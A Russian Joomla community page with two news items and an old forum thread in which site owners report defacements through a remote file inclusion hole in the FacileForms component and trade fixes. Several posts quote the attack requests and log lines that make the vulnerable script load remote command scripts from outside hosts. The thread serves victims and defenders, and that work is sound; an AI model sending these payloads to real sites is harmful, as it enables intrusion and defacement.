Новости Joomla

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

В процессе работы с Joomla бывает необходимо работать с пользовательским интерфейсом более тонко, чем обычно. Все формы Joomla состоят из стандартных полей, содержанием, стилем отображения, состоянием (включено/выключено, доступно для редактирования или нет и т.д.) можно управлять с помощью плагинов. Да и для нестандартных проектов хорошей практикой является создание одного системного или нескольких плагинов групп "под проект", в которых храниться весь "нестандарт".

В этой статье описаны все триггеры, которые вызываются через Event Dispatcher из administrator/components/com_fields/src/Helper/FieldsHelper.php, с привязкой к жизненному циклу (порядку этапов работы запроса), аргументам, изменяемым данным и дальнейшему распространению по Joomla. Это поможет вам работать с Joomla свободнее и не опасаясь при этом потерять изменения при очередном обновлении движка.

Подходы, описанные в статье, полезны в тех случаях, когда вы работаете с данными в com_fields - механизме создания и редактирования пользовательских полей ядра Joomla и при использовании FieldsHelper. Многие сторонние компоненты не используют эту возможность, поэтому данная статья будет полезна лишь частично.

Читать статью на Хабре.

@joomlafeed

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 19 Ответов
  • 10204 Просмотров
*

Murz

  • Новичок
  • 6
  • 2 / 0
C помощью дыры в компоненте FacileForms версии 1.4.4 у меня сегодня отдефейсили 3 сайта!
Хочу конешно выразить спасибо команде "cyber_error", которые произвели дефейс, что ничего не поломали, старый index.php аккуратно переименовали в old, но всё равно как-то не очень приятно ;)

Дыра, через которую дефейсили, находится в файле facileforms.frame.php, который запускал на исполнение скрипты:
http://www.acuariopeces.com/pnTemp/cmd.dat


Урл, через который всё это запускалось, выглядел так:
POST /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sv-sirzenich.de/images/c.jpg? HTTP/1.0

Ломануть получилось у них только через второй скрипт.

Причём, что интересно, ломанули не сам сайт, на котором был данный компонент, а соседние! По адресу находится скрипт, которому передаются команды и он умеет лазить по папкам и творить всякие другие интересные вещи...

Лечится либо удалением данного файла либо обновлением до новой версии. Так что всем, кто использует данный компонент, рекомендую в срочном порядке обновиться до новой версии и выпонить рекомендации, написанные на главной странице сайта
http://facileforms.biz/
« Последнее редактирование: 19.09.2006, 18:18:04 от Murz »
*

Murz

  • Новичок
  • 6
  • 2 / 0
В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем ;)
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
в КАЖДОМ php-файле ДОЛЖНА в начале присутствовать строка
defined( '_VALID_MOS' ) or die( 'Restricted access' );
иначе совместно со включенным register globals эти взломы будут везде.
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем ;)
ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться... а вот на Secunia вроде сообщений об уязвимости не было, и в официальном списке уязвимых расширений на форуме Joomla данный компонент тоже не числится...
*

Murz

  • Новичок
  • 6
  • 2 / 0
ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться...
Там в списке уязвимостей написано только про SQL injection, а не про то, что можно любой php-код на сайте выполнить.

Всем добрый вечер.
Всталкнулся с такой бедой , пытаються ломонуть мой сайт перед апом ya, с помощью 83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972

Пробовал банить по входящим Ip тоесть 83.143.162.10, не помогает пользуються проксями
проверил сайта www.yenzero.com не существует, просканил Nmapom выдает
Initiating SYN Stealth Scan against server1.wisd0m.net (216.12.200.18) [1672 ports] at 23:41
Discovered open port 80/tcp on 216.12.200.18
Discovered open port 21/tcp on 216.12.200.18
Discovered open port 25/tcp on 216.12.200.18
Discovered open port 443/tcp on 216.12.200.18
Discovered open port 22/tcp on 216.12.200.18
Discovered open port 110/tcp on 216.12.200.18
Discovered open port 3306/tcp on 216.12.200.18
Discovered open port 143/tcp on 216.12.200.18
Discovered open port 993/tcp on 216.12.200.18
Discovered open port 995/tcp on 216.12.200.18
The SYN Stealth Scan took 38.68s to scan 1672 total ports.
Host server1.wisd0m.net (216.12.200.18) appears to be up ... good.
Забанил

что посоветуете, стоит com_facileforms 1.4.7re
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
что посоветуете, стоит com_facileforms 1.4.7re
очень странно, эту дыру вроде ж давно закрыли... проверьте, что в начале файла /com_facileforms/facileforms.frame.php? есть строчка:

defined( '_VALID_MOS' ) or die( 'Restricted access' );

так нету у меня этого файла :o
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
здесь
83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972
написано обратное...
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Я сам раз десять проверил , в бекапах тоже , нет . в админ\сом_фацилаформ тоже нет ????

Люди помогите отловить гад*** , опять пытються дефейснуть????
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.ph
p?ff_compath=http://www.grodmansskolan.se/cmd.txt?
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
покажи конец строчки

зы. это логи случаем не с винроута?
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
 никому плохого не  делал, ни кого не обижал. Наверное жадные конкуренты , давяться что я в yandex топе


нет apache
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
200 27650
нифига не понимаю...
утвердительный ответ на запрос (200=ОК) и размер файла 27650 байт....
ну была отдача или я чего-то недопонимаю...

ps. очень рекомендую воспользоваться htaccess.txt (переименовать в .htaccess)
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404
 .htaccess есть, настроен от эксплойтов но видно слабо настроен:(
А определить того как определить откуда ?
адрес определил nmapom .grodmansskolan.se -  212.75.88.27 вчерашний 216.12.200.18

забанил
что делать дальше?
« Последнее редактирование: 16.03.2007, 22:50:21 от tolyan »
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
так какая сейчас у тебя версия фасили и джумлы?
htaccess от какой версии?
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Joomla последняя фацила 1.4.7 :o
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
1.
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
2.
делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404

кто-то их вас двоих не прав :)
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

да знаю, что протеворечят ответы, но сам не могу понять, почему
*

oppo

  • Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
вообще я считаю эти формы не нужны ..
что стоит написать модуль или бот с нужной формой сро всеми вкусностями кот. в данном случае нужны
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Можно ли автоматически выводить результаты заполненой анкеты на другую страницу сайта

Автор Veours

Ответов: 1
Просмотров: 7828
Последний ответ 18.04.2012, 01:24:14
от fragmarw
как перевести контактную форму созданную в FacileForms при помощи Joom!Fish?

Автор tierex

Ответов: 6
Просмотров: 10055
Последний ответ 18.01.2012, 10:24:19
от asav2011
FacileForms

Автор ps1panda

Ответов: 0
Просмотров: 16103
Последний ответ 12.12.2011, 14:10:55
от ps1panda
Ошибка после установки FacileForms 1.4.7 в Joomla 1.5.15

Автор tolian_27

Ответов: 4
Просмотров: 9120
Последний ответ 01.04.2011, 00:46:39
от Karry
Ошибка *** EXCEPTION CAUGHT BY FacileForms *** всплывает в новом окне

Автор azizovslava

Ответов: 0
Просмотров: 7259
Последний ответ 25.11.2010, 08:50:42
от azizovslava